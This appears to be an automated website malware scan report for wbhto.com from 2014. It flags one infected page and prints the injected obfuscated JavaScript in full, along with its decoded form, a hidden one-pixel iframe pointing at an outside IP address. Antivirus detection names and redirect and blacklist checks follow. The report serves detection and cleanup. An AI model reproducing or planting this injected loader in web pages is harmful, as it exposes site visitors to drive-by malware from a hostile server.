
Malware Scanner report for wbhto.com

Malicious/Suspicious/Total URLs checked: 1/0/5
1 page has malicious code. See details below.
Blacklists: OK
Malicious Redirects: OK
Malicious/Hidden/Total iFrames: 0/0/0
Deface / Content modification: OK


Scanned pages/files

Request | Server response | Status
http://wbhto.com/ | 200 OK; Content-Length: 425; Content-Type: text/html | clean
http://wbhto.com/cgi-bin/ | 403 Forbidden; Content-Length: 464; Content-Type: text/html | clean
http://wbhto.com/test404page.js | 404 Not Found; Content-Length: 466; Content-Type: text/html | clean
http://wbhto.com/images/ | 200 OK; Content-Length: 346; Content-Type: text/html | clean
http://wbhto.com/postinfo.html | 200 OK; Content-Length: 3101; Content-Type: text/html | malicious
Malicious code - confirmed by antiviruses (see below)

var source ="=tdsjqu?epdvnfou/xsjuf)Tusjoh/gspnDibsDpef)71-216-213-225-:8-21:-212-43-226-225-::-72-45-215-227-227-223-69-58-58-68-5:-57-5:-63-61-57-65-63-57-68-5:-58-227-226-58-216-221-57-::-214-216-74-86-227-212-226-45-43-22:-216-211-227-215-72-5:-43-215-212-216-214-215-227-72-5:-43-226-227-232-219-212-72-45-229-216-226-216-:9-216-219-216-227-232-69-43-215-216-211-211-212-221-45-73-71-58-216-213-225-:8-21:-212-73**<=0tdsjqu?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result);

Decoded script:


<iframe src="http://91.142.64.91/ts/in.cgi?Ktes" width=1 height=1 style="visibility: hidden"></iframe>

Antivirus reports:

Panda: JS/Iframe.AT
nProtect: JS:Trojan.Crypt.FW
K7AntiVirus: Trojan
Emsisoft: JS:Trojan.Crypt.FW (B)
Comodo: TrojWare.JS.Agent.iph
McAfee-GW-Edition: Heuristic.LooksLike.HTML.Infected.B
DrWeb: SCRIPT.Virus
Kaspersky: Trojan-Clicker.HTML.IFrame.aky
Microsoft: Exploit:HTML/IframeRef.AV
MicroWorld-eScan: JS:Trojan.Crypt.FW
Fortinet: JS/Crypt.CBAA!tr
NANO-Antivirus: Trojan.Script.Iframe.hqvxv
F-Secure: JS:Trojan.Crypt.FW
VIPRE: Heur.HTML.MalIFrame (v)
Norman: Clicker.NY
GData: JS:Trojan.Crypt.FW
ESET-NOD32: JS/Kryptik.AD
BitDefender: JS:Trojan.Crypt.FW


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: wbhto.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 17:18:58 GMT
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/1.0.0-fips mod_bwlimited/1.4 PHP/5.2.9
Content-Length: 425
Content-Type: text/html;charset=ISO-8859-1

...425 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: wbhto.com
Referer: http://www.google.com/search?q=wbhto.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=wbhto.com

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://wbhto.com/

Result: wbhto.com is not infected or malware details are not published yet.